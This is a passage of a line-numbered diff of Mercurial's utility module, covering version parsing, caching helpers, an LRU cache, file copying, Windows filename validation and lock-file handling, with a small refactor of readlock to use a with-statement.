999 999 (3, 6)
1000 1000 >>> versiontuple(v, 3)
1001 1001 (3, 6, None)
1002 1002 >>> versiontuple(v, 4)
1003 1003 (3, 6, None, None)
1004 1004
1005 1005 >>> v = b'3.9-rc'
1006 1006 >>> versiontuple(v, 2)
1007 1007 (3, 9)
1008 1008 >>> versiontuple(v, 3)
1009 1009 (3, 9, None)
1010 1010 >>> versiontuple(v, 4)
1011 1011 (3, 9, None, 'rc')
1012 1012
1013 1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 1014 >>> versiontuple(v, 2)
1015 1015 (3, 9)
1016 1016 >>> versiontuple(v, 3)
1017 1017 (3, 9, None)
1018 1018 >>> versiontuple(v, 4)
1019 1019 (3, 9, None, 'rc+2-02a8fea4289b')
1020 1020
1021 1021 >>> versiontuple(b'4.6rc0')
1022 1022 (4, 6, None, 'rc0')
1023 1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 1024 (4, 6, None, 'rc0+12-425d55e54f98')
1025 1025 >>> versiontuple(b'.1.2.3')
1026 1026 (None, None, None, '.1.2.3')
1027 1027 >>> versiontuple(b'12.34..5')
1028 1028 (12, 34, None, '..5')
1029 1029 >>> versiontuple(b'1.2.3.4.5.6')
1030 1030 (1, 2, 3, '.4.5.6')
1031 1031 """
1032 1032 if not v:
1033 1033 v = version()
1034 1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 1035 if not m:
1036 1036 vparts, extra = '', v
1037 1037 elif m.group(2):
1038 1038 vparts, extra = m.groups()
1039 1039 else:
1040 1040 vparts, extra = m.group(1), None
1041 1041
1042 1042 vints = []
1043 1043 for i in vparts.split('.'):
1044 1044 try:
1045 1045 vints.append(int(i))
1046 1046 except ValueError:
1047 1047 break
1048 1048 # (3, 6) -> (3, 6, None)
1049 1049 while len(vints) < 3:
1050 1050 vints.append(None)
1051 1051
1052 1052 if n == 2:
1053 1053 return (vints[0], vints[1])
1054 1054 if n == 3:
1055 1055 return (vints[0], vints[1], vints[2])
1056 1056 if n == 4:
1057 1057 return (vints[0], vints[1], vints[2], extra)
1058 1058
1059 1059 def cachefunc(func):
1060 1060 '''cache the result of function calls'''
1061 1061 # XXX doesn't handle keywords args
1062 1062 if func.__code__.co_argcount == 0:
1063 1063 cache = []
1064 1064 def f():
1065 1065 if len(cache) == 0:
1066 1066 cache.append(func())
1067 1067 return cache[0]
1068 1068 return f
1069 1069 cache = {}
1070 1070 if func.__code__.co_argcount == 1:
1071 1071 # we gain a small amount of time because
1072 1072 # we don't need to pack/unpack the list
1073 1073 def f(arg):
1074 1074 if arg not in cache:
1075 1075 cache[arg] = func(arg)
1076 1076 return cache[arg]
1077 1077 else:
1078 1078 def f(*args):
1079 1079 if args not in cache:
1080 1080 cache[args] = func(*args)
1081 1081 return cache[args]
1082 1082
1083 1083 return f
1084 1084
1085 1085 class cow(object):
1086 1086 """helper class to make copy-on-write easier
1087 1087
1088 1088 Call preparewrite before doing any writes.
1089 1089 """
1090 1090
1091 1091 def preparewrite(self):
1092 1092 """call this before writes, return self or a copied new object"""
1093 1093 if getattr(self, '_copied', 0):
1094 1094 self._copied -= 1
1095 1095 return self.__class__(self)
1096 1096 return self
1097 1097
1098 1098 def copy(self):
1099 1099 """always do a cheap copy"""
1100 1100 self._copied = getattr(self, '_copied', 0) + 1
1101 1101 return self
1102 1102
1103 1103 class sortdict(collections.OrderedDict):
1104 1104 '''a simple sorted dictionary
1105 1105
1106 1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 1107 >>> d2 = d1.copy()
1108 1108 >>> d2
1109 1109 sortdict([('a', 0), ('b', 1)])
1110 1110 >>> d2.update([(b'a', 2)])
1111 1111 >>> list(d2.keys()) # should still be in last-set order
1112 1112 ['b', 'a']
1113 1113 '''
1114 1114
1115 1115 def __setitem__(self, key, value):
1116 1116 if key in self:
1117 1117 del self[key]
1118 1118 super(sortdict, self).__setitem__(key, value)
1119 1119
1120 1120 if pycompat.ispypy:
1121 1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 1122 def update(self, src):
1123 1123 if isinstance(src, dict):
1124 1124 src = src.iteritems()
1125 1125 for k, v in src:
1126 1126 self[k] = v
1127 1127
1128 1128 class cowdict(cow, dict):
1129 1129 """copy-on-write dict
1130 1130
1131 1131 Be sure to call d = d.preparewrite() before writing to d.
1132 1132
1133 1133 >>> a = cowdict()
1134 1134 >>> a is a.preparewrite()
1135 1135 True
1136 1136 >>> b = a.copy()
1137 1137 >>> b is a
1138 1138 True
1139 1139 >>> c = b.copy()
1140 1140 >>> c is a
1141 1141 True
1142 1142 >>> a = a.preparewrite()
1143 1143 >>> b is a
1144 1144 False
1145 1145 >>> a is a.preparewrite()
1146 1146 True
1147 1147 >>> c = c.preparewrite()
1148 1148 >>> b is c
1149 1149 False
1150 1150 >>> b is b.preparewrite()
1151 1151 True
1152 1152 """
1153 1153
1154 1154 class cowsortdict(cow, sortdict):
1155 1155 """copy-on-write sortdict
1156 1156
1157 1157 Be sure to call d = d.preparewrite() before writing to d.
1158 1158 """
1159 1159
1160 1160 class transactional(object):
1161 1161 """Base class for making a transactional type into a context manager."""
1162 1162 __metaclass__ = abc.ABCMeta
1163 1163
1164 1164 @abc.abstractmethod
1165 1165 def close(self):
1166 1166 """Successfully closes the transaction."""
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def release(self):
1170 1170 """Marks the end of the transaction.
1171 1171
1172 1172 If the transaction has not been closed, it will be aborted.
1173 1173 """
1174 1174
1175 1175 def __enter__(self):
1176 1176 return self
1177 1177
1178 1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 1179 try:
1180 1180 if exc_type is None:
1181 1181 self.close()
1182 1182 finally:
1183 1183 self.release()
1184 1184
1185 1185 @contextlib.contextmanager
1186 1186 def acceptintervention(tr=None):
1187 1187 """A context manager that closes the transaction on InterventionRequired
1188 1188
1189 1189 If no transaction was provided, this simply runs the body and returns
1190 1190 """
1191 1191 if not tr:
1192 1192 yield
1193 1193 return
1194 1194 try:
1195 1195 yield
1196 1196 tr.close()
1197 1197 except error.InterventionRequired:
1198 1198 tr.close()
1199 1199 raise
1200 1200 finally:
1201 1201 tr.release()
1202 1202
1203 1203 @contextlib.contextmanager
1204 1204 def nullcontextmanager():
1205 1205 yield
1206 1206
1207 1207 class _lrucachenode(object):
1208 1208 """A node in a doubly linked list.
1209 1209
1210 1210 Holds a reference to nodes on either side as well as a key-value
1211 1211 pair for the dictionary entry.
1212 1212 """
1213 1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214 1214
1215 1215 def __init__(self):
1216 1216 self.next = None
1217 1217 self.prev = None
1218 1218
1219 1219 self.key = _notset
1220 1220 self.value = None
1221 1221 self.cost = 0
1222 1222
1223 1223 def markempty(self):
1224 1224 """Mark the node as emptied."""
1225 1225 self.key = _notset
1226 1226 self.value = None
1227 1227 self.cost = 0
1228 1228
1229 1229 class lrucachedict(object):
1230 1230 """Dict that caches most recent accesses and sets.
1231 1231
1232 1232 The dict consists of an actual backing dict - indexed by original
1233 1233 key - and a doubly linked circular list defining the order of entries in
1234 1234 the cache.
1235 1235
1236 1236 The head node is the newest entry in the cache. If the cache is full,
1237 1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 1238 the node being moved to before the existing head and being marked as the
1239 1239 new head node.
1240 1240
1241 1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 1242 simply an integer that is specified by the caller. The cache can be queried
1243 1243 for the total cost of all items presently in the cache.
1244 1244
1245 1245 The cache can also define a maximum cost. If a cache insertion would
1246 1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 1247 nodes will be evicted to make room for the new code. This can be used
1248 1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 1250 """
1251 1251 def __init__(self, max, maxcost=0):
1252 1252 self._cache = {}
1253 1253
1254 1254 self._head = head = _lrucachenode()
1255 1255 head.prev = head
1256 1256 head.next = head
1257 1257 self._size = 1
1258 1258 self.capacity = max
1259 1259 self.totalcost = 0
1260 1260 self.maxcost = maxcost
1261 1261
1262 1262 def __len__(self):
1263 1263 return len(self._cache)
1264 1264
1265 1265 def __contains__(self, k):
1266 1266 return k in self._cache
1267 1267
1268 1268 def __iter__(self):
1269 1269 # We don't have to iterate in cache order, but why not.
1270 1270 n = self._head
1271 1271 for i in range(len(self._cache)):
1272 1272 yield n.key
1273 1273 n = n.next
1274 1274
1275 1275 def __getitem__(self, k):
1276 1276 node = self._cache[k]
1277 1277 self._movetohead(node)
1278 1278 return node.value
1279 1279
1280 1280 def insert(self, k, v, cost=0):
1281 1281 """Insert a new item in the cache with optional cost value."""
1282 1282 node = self._cache.get(k)
1283 1283 # Replace existing value and mark as newest.
1284 1284 if node is not None:
1285 1285 self.totalcost -= node.cost
1286 1286 node.value = v
1287 1287 node.cost = cost
1288 1288 self.totalcost += cost
1289 1289 self._movetohead(node)
1290 1290
1291 1291 if self.maxcost:
1292 1292 self._enforcecostlimit()
1293 1293
1294 1294 return
1295 1295
1296 1296 if self._size < self.capacity:
1297 1297 node = self._addcapacity()
1298 1298 else:
1299 1299 # Grab the last/oldest item.
1300 1300 node = self._head.prev
1301 1301
1302 1302 # At capacity. Kill the old entry.
1303 1303 if node.key is not _notset:
1304 1304 self.totalcost -= node.cost
1305 1305 del self._cache[node.key]
1306 1306
1307 1307 node.key = k
1308 1308 node.value = v
1309 1309 node.cost = cost
1310 1310 self.totalcost += cost
1311 1311 self._cache[k] = node
1312 1312 # And mark it as newest entry. No need to adjust order since it
1313 1313 # is already self._head.prev.
1314 1314 self._head = node
1315 1315
1316 1316 if self.maxcost:
1317 1317 self._enforcecostlimit()
1318 1318
1319 1319 def __setitem__(self, k, v):
1320 1320 self.insert(k, v)
1321 1321
1322 1322 def __delitem__(self, k):
1323 1323 node = self._cache.pop(k)
1324 1324 self.totalcost -= node.cost
1325 1325 node.markempty()
1326 1326
1327 1327 # Temporarily mark as newest item before re-adjusting head to make
1328 1328 # this node the oldest item.
1329 1329 self._movetohead(node)
1330 1330 self._head = node.next
1331 1331
1332 1332 # Additional dict methods.
1333 1333
1334 1334 def get(self, k, default=None):
1335 1335 try:
1336 1336 return self.__getitem__(k)
1337 1337 except KeyError:
1338 1338 return default
1339 1339
1340 1340 def clear(self):
1341 1341 n = self._head
1342 1342 while n.key is not _notset:
1343 1343 self.totalcost -= n.cost
1344 1344 n.markempty()
1345 1345 n = n.next
1346 1346
1347 1347 self._cache.clear()
1348 1348
1349 1349 def copy(self, capacity=None, maxcost=0):
1350 1350 """Create a new cache as a copy of the current one.
1351 1351
1352 1352 By default, the new cache has the same capacity as the existing one.
1353 1353 But, the cache capacity can be changed as part of performing the
1354 1354 copy.
1355 1355
1356 1356 Items in the copy have an insertion/access order matching this
1357 1357 instance.
1358 1358 """
1359 1359
1360 1360 capacity = capacity or self.capacity
1361 1361 maxcost = maxcost or self.maxcost
1362 1362 result = lrucachedict(capacity, maxcost=maxcost)
1363 1363
1364 1364 # We copy entries by iterating in oldest-to-newest order so the copy
1365 1365 # has the correct ordering.
1366 1366
1367 1367 # Find the first non-empty entry.
1368 1368 n = self._head.prev
1369 1369 while n.key is _notset and n is not self._head:
1370 1370 n = n.prev
1371 1371
1372 1372 # We could potentially skip the first N items when decreasing capacity.
1373 1373 # But let's keep it simple unless it is a performance problem.
1374 1374 for i in range(len(self._cache)):
1375 1375 result.insert(n.key, n.value, cost=n.cost)
1376 1376 n = n.prev
1377 1377
1378 1378 return result
1379 1379
1380 1380 def popoldest(self):
1381 1381 """Remove the oldest item from the cache.
1382 1382
1383 1383 Returns the (key, value) describing the removed cache entry.
1384 1384 """
1385 1385 if not self._cache:
1386 1386 return
1387 1387
1388 1388 # Walk the linked list backwards starting at tail node until we hit
1389 1389 # a non-empty node.
1390 1390 n = self._head.prev
1391 1391 while n.key is _notset:
1392 1392 n = n.prev
1393 1393
1394 1394 key, value = n.key, n.value
1395 1395
1396 1396 # And remove it from the cache and mark it as empty.
1397 1397 del self._cache[n.key]
1398 1398 self.totalcost -= n.cost
1399 1399 n.markempty()
1400 1400
1401 1401 return key, value
1402 1402
1403 1403 def _movetohead(self, node):
1404 1404 """Mark a node as the newest, making it the new head.
1405 1405
1406 1406 When a node is accessed, it becomes the freshest entry in the LRU
1407 1407 list, which is denoted by self._head.
1408 1408
1409 1409 Visually, let's make ``N`` the new head node (* denotes head):
1410 1410
1411 1411 previous/oldest <-> head <-> next/next newest
1412 1412
1413 1413 ----<->--- A* ---<->-----
1414 1414 | |
1415 1415 E <-> D <-> N <-> C <-> B
1416 1416
1417 1417 To:
1418 1418
1419 1419 ----<->--- N* ---<->-----
1420 1420 | |
1421 1421 E <-> D <-> C <-> B <-> A
1422 1422
1423 1423 This requires the following moves:
1424 1424
1425 1425 C.next = D (node.prev.next = node.next)
1426 1426 D.prev = C (node.next.prev = node.prev)
1427 1427 E.next = N (head.prev.next = node)
1428 1428 N.prev = E (node.prev = head.prev)
1429 1429 N.next = A (node.next = head)
1430 1430 A.prev = N (head.prev = node)
1431 1431 """
1432 1432 head = self._head
1433 1433 # C.next = D
1434 1434 node.prev.next = node.next
1435 1435 # D.prev = C
1436 1436 node.next.prev = node.prev
1437 1437 # N.prev = E
1438 1438 node.prev = head.prev
1439 1439 # N.next = A
1440 1440 # It is tempting to do just "head" here, however if node is
1441 1441 # adjacent to head, this will do bad things.
1442 1442 node.next = head.prev.next
1443 1443 # E.next = N
1444 1444 node.next.prev = node
1445 1445 # A.prev = N
1446 1446 node.prev.next = node
1447 1447
1448 1448 self._head = node
1449 1449
1450 1450 def _addcapacity(self):
1451 1451 """Add a node to the circular linked list.
1452 1452
1453 1453 The new node is inserted before the head node.
1454 1454 """
1455 1455 head = self._head
1456 1456 node = _lrucachenode()
1457 1457 head.prev.next = node
1458 1458 node.prev = head.prev
1459 1459 node.next = head
1460 1460 head.prev = node
1461 1461 self._size += 1
1462 1462 return node
1463 1463
1464 1464 def _enforcecostlimit(self):
1465 1465 # This should run after an insertion. It should only be called if total
1466 1466 # cost limits are being enforced.
1467 1467 # The most recently inserted node is never evicted.
1468 1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 1469 return
1470 1470
1471 1471 # This is logically equivalent to calling popoldest() until we
1472 1472 # free up enough cost. We don't do that since popoldest() needs
1473 1473 # to walk the linked list and doing this in a loop would be
1474 1474 # quadratic. So we find the first non-empty node and then
1475 1475 # walk nodes until we free up enough capacity.
1476 1476 #
1477 1477 # If we only removed the minimum number of nodes to free enough
1478 1478 # cost at insert time, chances are high that the next insert would
1479 1479 # also require pruning. This would effectively constitute quadratic
1480 1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 1481 # target cost that is a percentage of the max cost. This will tend
1482 1482 # to free more nodes when the high water mark is reached, which
1483 1483 # lowers the chances of needing to prune on the subsequent insert.
1484 1484 targetcost = int(self.maxcost * 0.75)
1485 1485
1486 1486 n = self._head.prev
1487 1487 while n.key is _notset:
1488 1488 n = n.prev
1489 1489
1490 1490 while len(self) > 1 and self.totalcost > targetcost:
1491 1491 del self._cache[n.key]
1492 1492 self.totalcost -= n.cost
1493 1493 n.markempty()
1494 1494 n = n.prev
1495 1495
1496 1496 def lrucachefunc(func):
1497 1497 '''cache most recent results of function calls'''
1498 1498 cache = {}
1499 1499 order = collections.deque()
1500 1500 if func.__code__.co_argcount == 1:
1501 1501 def f(arg):
1502 1502 if arg not in cache:
1503 1503 if len(cache) > 20:
1504 1504 del cache[order.popleft()]
1505 1505 cache[arg] = func(arg)
1506 1506 else:
1507 1507 order.remove(arg)
1508 1508 order.append(arg)
1509 1509 return cache[arg]
1510 1510 else:
1511 1511 def f(*args):
1512 1512 if args not in cache:
1513 1513 if len(cache) > 20:
1514 1514 del cache[order.popleft()]
1515 1515 cache[args] = func(*args)
1516 1516 else:
1517 1517 order.remove(args)
1518 1518 order.append(args)
1519 1519 return cache[args]
1520 1520
1521 1521 return f
1522 1522
1523 1523 class propertycache(object):
1524 1524 def __init__(self, func):
1525 1525 self.func = func
1526 1526 self.name = func.__name__
1527 1527 def __get__(self, obj, type=None):
1528 1528 result = self.func(obj)
1529 1529 self.cachevalue(obj, result)
1530 1530 return result
1531 1531
1532 1532 def cachevalue(self, obj, value):
1533 1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 1534 obj.__dict__[self.name] = value
1535 1535
1536 1536 def clearcachedproperty(obj, prop):
1537 1537 '''clear a cached property value, if one has been set'''
1538 1538 if prop in obj.__dict__:
1539 1539 del obj.__dict__[prop]
1540 1540
1541 1541 def increasingchunks(source, min=1024, max=65536):
1542 1542 '''return no less than min bytes per chunk while data remains,
1543 1543 doubling min after each chunk until it reaches max'''
1544 1544 def log2(x):
1545 1545 if not x:
1546 1546 return 0
1547 1547 i = 0
1548 1548 while x:
1549 1549 x >>= 1
1550 1550 i += 1
1551 1551 return i - 1
1552 1552
1553 1553 buf = []
1554 1554 blen = 0
1555 1555 for chunk in source:
1556 1556 buf.append(chunk)
1557 1557 blen += len(chunk)
1558 1558 if blen >= min:
1559 1559 if min < max:
1560 1560 min = min << 1
1561 1561 nmin = 1 << log2(blen)
1562 1562 if nmin > min:
1563 1563 min = nmin
1564 1564 if min > max:
1565 1565 min = max
1566 1566 yield ''.join(buf)
1567 1567 blen = 0
1568 1568 buf = []
1569 1569 if buf:
1570 1570 yield ''.join(buf)
1571 1571
1572 1572 def always(fn):
1573 1573 return True
1574 1574
1575 1575 def never(fn):
1576 1576 return False
1577 1577
1578 1578 def nogc(func):
1579 1579 """disable garbage collector
1580 1580
1581 1581 Python's garbage collector triggers a GC each time a certain number of
1582 1582 container objects (the number being defined by gc.get_threshold()) are
1583 1583 allocated even when marked not to be tracked by the collector. Tracking has
1584 1584 no effect on when GCs are triggered, only on what objects the GC looks
1585 1585 into. As a workaround, disable GC while building complex (huge)
1586 1586 containers.
1587 1587
1588 1588 This garbage collector issue have been fixed in 2.7. But it still affect
1589 1589 CPython's performance.
1590 1590 """
1591 1591 def wrapper(*args, **kwargs):
1592 1592 gcenabled = gc.isenabled()
1593 1593 gc.disable()
1594 1594 try:
1595 1595 return func(*args, **kwargs)
1596 1596 finally:
1597 1597 if gcenabled:
1598 1598 gc.enable()
1599 1599 return wrapper
1600 1600
1601 1601 if pycompat.ispypy:
1602 1602 # PyPy runs slower with gc disabled
1603 1603 nogc = lambda x: x
1604 1604
1605 1605 def pathto(root, n1, n2):
1606 1606 '''return the relative path from one place to another.
1607 1607 root should use os.sep to separate directories
1608 1608 n1 should use os.sep to separate directories
1609 1609 n2 should use "/" to separate directories
1610 1610 returns an os.sep-separated path.
1611 1611
1612 1612 If n1 is a relative path, it's assumed it's
1613 1613 relative to root.
1614 1614 n2 should always be relative to root.
1615 1615 '''
1616 1616 if not n1:
1617 1617 return localpath(n2)
1618 1618 if os.path.isabs(n1):
1619 1619 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1620 1620 return os.path.join(root, localpath(n2))
1621 1621 n2 = '/'.join((pconvert(root), n2))
1622 1622 a, b = splitpath(n1), n2.split('/')
1623 1623 a.reverse()
1624 1624 b.reverse()
1625 1625 while a and b and a[-1] == b[-1]:
1626 1626 a.pop()
1627 1627 b.pop()
1628 1628 b.reverse()
1629 1629 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1630 1630
1631 1631 # the location of data files matching the source code
1632 1632 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1633 1633 # executable version (py2exe) doesn't support __file__
1634 1634 datapath = os.path.dirname(pycompat.sysexecutable)
1635 1635 else:
1636 1636 datapath = os.path.dirname(pycompat.fsencode(__file__))
1637 1637
1638 1638 i18n.setdatapath(datapath)
1639 1639
1640 1640 def checksignature(func):
1641 1641 '''wrap a function with code to check for calling errors'''
1642 1642 def check(*args, **kwargs):
1643 1643 try:
1644 1644 return func(*args, **kwargs)
1645 1645 except TypeError:
1646 1646 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1647 1647 raise error.SignatureError
1648 1648 raise
1649 1649
1650 1650 return check
1651 1651
1652 1652 # a whilelist of known filesystems where hardlink works reliably
1653 1653 _hardlinkfswhitelist = {
1654 1654 'apfs',
1655 1655 'btrfs',
1656 1656 'ext2',
1657 1657 'ext3',
1658 1658 'ext4',
1659 1659 'hfs',
1660 1660 'jfs',
1661 1661 'NTFS',
1662 1662 'reiserfs',
1663 1663 'tmpfs',
1664 1664 'ufs',
1665 1665 'xfs',
1666 1666 'zfs',
1667 1667 }
1668 1668
1669 1669 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1670 1670 '''copy a file, preserving mode and optionally other stat info like
1671 1671 atime/mtime
1672 1672
1673 1673 checkambig argument is used with filestat, and is useful only if
1674 1674 destination file is guarded by any lock (e.g. repo.lock or
1675 1675 repo.wlock).
1676 1676
1677 1677 copystat and checkambig should be exclusive.
1678 1678 '''
1679 1679 assert not (copystat and checkambig)
1680 1680 oldstat = None
1681 1681 if os.path.lexists(dest):
1682 1682 if checkambig:
1683 1683 oldstat = checkambig and filestat.frompath(dest)
1684 1684 unlink(dest)
1685 1685 if hardlink:
1686 1686 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1687 1687 # unless we are confident that dest is on a whitelisted filesystem.
1688 1688 try:
1689 1689 fstype = getfstype(os.path.dirname(dest))
1690 1690 except OSError:
1691 1691 fstype = None
1692 1692 if fstype not in _hardlinkfswhitelist:
1693 1693 hardlink = False
1694 1694 if hardlink:
1695 1695 try:
1696 1696 oslink(src, dest)
1697 1697 return
1698 1698 except (IOError, OSError):
1699 1699 pass # fall back to normal copy
1700 1700 if os.path.islink(src):
1701 1701 os.symlink(os.readlink(src), dest)
1702 1702 # copytime is ignored for symlinks, but in general copytime isn't needed
1703 1703 # for them anyway
1704 1704 else:
1705 1705 try:
1706 1706 shutil.copyfile(src, dest)
1707 1707 if copystat:
1708 1708 # copystat also copies mode
1709 1709 shutil.copystat(src, dest)
1710 1710 else:
1711 1711 shutil.copymode(src, dest)
1712 1712 if oldstat and oldstat.stat:
1713 1713 newstat = filestat.frompath(dest)
1714 1714 if newstat.isambig(oldstat):
1715 1715 # stat of copied file is ambiguous to original one
1716 1716 advanced = (
1717 1717 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1718 1718 os.utime(dest, (advanced, advanced))
1719 1719 except shutil.Error as inst:
1720 1720 raise error.Abort(str(inst))
1721 1721
1722 1722 def copyfiles(src, dst, hardlink=None, progress=None):
1723 1723 """Copy a directory tree using hardlinks if possible."""
1724 1724 num = 0
1725 1725
1726 1726 def settopic():
1727 1727 if progress:
1728 1728 progress.topic = _('linking') if hardlink else _('copying')
1729 1729
1730 1730 if os.path.isdir(src):
1731 1731 if hardlink is None:
1732 1732 hardlink = (os.stat(src).st_dev ==
1733 1733 os.stat(os.path.dirname(dst)).st_dev)
1734 1734 settopic()
1735 1735 os.mkdir(dst)
1736 1736 for name, kind in listdir(src):
1737 1737 srcname = os.path.join(src, name)
1738 1738 dstname = os.path.join(dst, name)
1739 1739 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1740 1740 num += n
1741 1741 else:
1742 1742 if hardlink is None:
1743 1743 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1744 1744 os.stat(os.path.dirname(dst)).st_dev)
1745 1745 settopic()
1746 1746
1747 1747 if hardlink:
1748 1748 try:
1749 1749 oslink(src, dst)
1750 1750 except (IOError, OSError):
1751 1751 hardlink = False
1752 1752 shutil.copy(src, dst)
1753 1753 else:
1754 1754 shutil.copy(src, dst)
1755 1755 num += 1
1756 1756 if progress:
1757 1757 progress.increment()
1758 1758
1759 1759 return hardlink, num
1760 1760
1761 1761 _winreservednames = {
1762 1762 'con', 'prn', 'aux', 'nul',
1763 1763 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1764 1764 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1765 1765 }
1766 1766 _winreservedchars = ':*?"<>|'
1767 1767 def checkwinfilename(path):
1768 1768 r'''Check that the base-relative path is a valid filename on Windows.
1769 1769 Returns None if the path is ok, or a UI string describing the problem.
1770 1770
1771 1771 >>> checkwinfilename(b"just/a/normal/path")
1772 1772 >>> checkwinfilename(b"foo/bar/con.xml")
1773 1773 "filename contains 'con', which is reserved on Windows"
1774 1774 >>> checkwinfilename(b"foo/con.xml/bar")
1775 1775 "filename contains 'con', which is reserved on Windows"
1776 1776 >>> checkwinfilename(b"foo/bar/xml.con")
1777 1777 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1778 1778 "filename contains 'AUX', which is reserved on Windows"
1779 1779 >>> checkwinfilename(b"foo/bar/bla:.txt")
1780 1780 "filename contains ':', which is reserved on Windows"
1781 1781 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1782 1782 "filename contains '\\x07', which is invalid on Windows"
1783 1783 >>> checkwinfilename(b"foo/bar/bla ")
1784 1784 "filename ends with ' ', which is not allowed on Windows"
1785 1785 >>> checkwinfilename(b"../bar")
1786 1786 >>> checkwinfilename(b"foo\\")
1787 1787 "filename ends with '\\', which is invalid on Windows"
1788 1788 >>> checkwinfilename(b"foo\\/bar")
1789 1789 "directory name ends with '\\', which is invalid on Windows"
1790 1790 '''
1791 1791 if path.endswith('\\'):
1792 1792 return _("filename ends with '\\', which is invalid on Windows")
1793 1793 if '\\/' in path:
1794 1794 return _("directory name ends with '\\', which is invalid on Windows")
1795 1795 for n in path.replace('\\', '/').split('/'):
1796 1796 if not n:
1797 1797 continue
1798 1798 for c in _filenamebytestr(n):
1799 1799 if c in _winreservedchars:
1800 1800 return _("filename contains '%s', which is reserved "
1801 1801 "on Windows") % c
1802 1802 if ord(c) <= 31:
1803 1803 return _("filename contains '%s', which is invalid "
1804 1804 "on Windows") % stringutil.escapestr(c)
1805 1805 base = n.split('.')[0]
1806 1806 if base and base.lower() in _winreservednames:
1807 1807 return _("filename contains '%s', which is reserved "
1808 1808 "on Windows") % base
1809 1809 t = n[-1:]
1810 1810 if t in '. ' and n not in '..':
1811 1811 return _("filename ends with '%s', which is not allowed "
1812 1812 "on Windows") % t
1813 1813
1814 1814 if pycompat.iswindows:
1815 1815 checkosfilename = checkwinfilename
1816 1816 timer = time.clock
1817 1817 else:
1818 1818 checkosfilename = platform.checkosfilename
1819 1819 timer = time.time
1820 1820
1821 1821 if safehasattr(time, "perf_counter"):
1822 1822 timer = time.perf_counter
1823 1823
1824 1824 def makelock(info, pathname):
1825 1825 """Create a lock file atomically if possible
1826 1826
1827 1827 This may leave a stale lock file if symlink isn't supported and signal
1828 1828 interrupt is enabled.
1829 1829 """
1830 1830 try:
1831 1831 return os.symlink(info, pathname)
1832 1832 except OSError as why:
1833 1833 if why.errno == errno.EEXIST:
1834 1834 raise
1835 1835 except AttributeError: # no symlink in os
1836 1836 pass
1837 1837
1838 1838 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1839 1839 ld = os.open(pathname, flags)
1840 1840 os.write(ld, info)
1841 1841 os.close(ld)
1842 1842
1843 1843 def readlock(pathname):
1844 1844 try:
1845 1845 return readlink(pathname)
1846 1846 except OSError as why:
1847 1847 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1848 1848 raise
1849 1849 except AttributeError: # no symlink in os
1850 1850 pass
1851 fp = posixfile(pathname, 'rb')
1852 r = fp.read()
1853 fp.close()
1854 return r
1851 with posixfile(pathname, 'rb') as fp:
1852 return fp.read()
1855 1853
1856 1854 def fstat(fp):
1857 1855 '''stat file object that may not have fileno method.'''
1858 1856 try:
1859 1857 return os.fstat(fp.fileno())
1860 1858 except AttributeError:
1861 1859 return os.stat(fp.name)
1862 1860
1863 1861 # File system features
1864 1862
1865 1863 def fscasesensitive(path):
1866 1864 """
1867 1865 Return true if the given path is on a case-sensitive filesystem
1868 1866
1869 1867 Requires a path (like /foo/.hg) ending with a foldable final
1870 1868 directory component.
1871 1869 """
1872 1870 s1 = os.lstat(path)
1873 1871 d, b = os.path.split(path)
1874 1872 b2 = b.upper()
1875 1873 if b == b2:
1876 1874 b2 = b.lower()
1877 1875 if b == b2:
1878 1876 return True # no evidence against case sensitivity
1879 1877 p2 = os.path.join(d, b2)
1880 1878 try:
1881 1879 s2 = os.lstat(p2)
1882 1880 if s2 == s1:
1883 1881 return False
1884 1882 return True
1885 1883 except OSError:
1886 1884 return True
1887 1885
1888 1886 try:
1889 1887 import re2
1890 1888 _re2 = None
1891 1889 except ImportError:
1892 1890 _re2 = False
1893 1891
1894 1892 class _re(object):
1895 1893 def _checkre2(self):
1896 1894 global _re2
1897 1895 try:
1898 1896 # check if match works, see issue3964
1899 1897 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1900 1898 except ImportError:
1901 1899 _re2 = False
1902 1900
1903 1901 def compile(self, pat, flags=0):
1904 1902 '''Compile a regular expression, using re2 if possible
1905 1903
1906 1904 For best performance, use only re2-compatible regexp features. The
1907 1905 only flags from the re module that are re2-compatible are
1908 1906 IGNORECASE and MULTILINE.'''
1909 1907 if _re2 is None:
1910 1908 self._checkre2()
1911 1909 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1912 1910 if flags & remod.IGNORECASE:
1913 1911 pat = '(?i)' + pat
1914 1912 if flags & remod.MULTILINE:
1915 1913 pat = '(?m)' + pat
1916 1914 try:
1917 1915 return re2.compile(pat)
1918 1916 except re2.error:
1919 1917 pass
1920 1918 return remod.compile(pat, flags)
1921 1919
